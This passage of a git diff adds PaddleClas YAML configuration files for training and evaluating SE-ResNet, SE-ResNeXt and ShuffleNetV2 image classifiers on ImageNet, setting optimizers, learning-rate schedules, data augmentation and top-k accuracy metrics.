&use_pure_fp16 True + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.00007 + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + output_fp16: *use_pure_fp16 + channel_num: *image_channel + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + output_fp16: *use_pure_fp16 + channel_num: *image_channel + sampler: + name: BatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + output_fp16: *use_pure_fp16 + channel_num: *image_channel + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNeXt50_32x4d.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNeXt50_32x4d.yaml new file mode 100644 index 0000000..2c12869 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNeXt50_32x4d.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: SE_ResNeXt50_32x4d + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.00007 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNeXt50_vd_32x4d.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNeXt50_vd_32x4d.yaml new file mode 100644 index 0000000..48e6e42 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNeXt50_vd_32x4d.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: SE_ResNeXt50_vd_32x4d + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.00007 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNet18_vd.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNet18_vd.yaml new file mode 100644 index 0000000..20b3a0c --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNet18_vd.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: SE_ResNet18_vd + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.00007 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNet34_vd.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNet34_vd.yaml new file mode 100644 index 0000000..7280e32 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNet34_vd.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: SE_ResNet34_vd + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.00007 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNet50_vd.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNet50_vd.yaml new file mode 100644 index 0000000..030dff9 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNet50_vd.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: SE_ResNet50_vd + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.00007 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_swish.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_swish.yaml new file mode 100644 index 0000000..79bb34e --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_swish.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 240 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ShuffleNetV2_swish + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.5 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00004 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_x0_25.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_x0_25.yaml new file mode 100644 index 0000000..aa1cce1 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_x0_25.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 240 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ShuffleNetV2_x0_25 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.5 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00003 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_x0_33.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_x0_33.yaml new file mode 100644 index 0000000..3f0742e --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_x0_33.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 240 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ShuffleNetV2_x0_33 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.5 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00003 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_x0_5.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_x0_5.yaml new file mode 100644 index 0000000..f14a249 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_x0_5.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 240 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ShuffleNetV2_x0_5 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.5 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00003 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_x1_0.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_x1_0.yaml new file mode 100644 index 0000000..dd4820d --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_x1_0.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 240 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ShuffleNetV2_x1_0 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.5 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00004 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_x1_5.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_x1_5.yaml new file mode 100644 index 0000000..9a05a59 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ShuffleNet/ShuffleNetV2_x1_5.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 240 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ShuffleNetV2_x1_5 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: 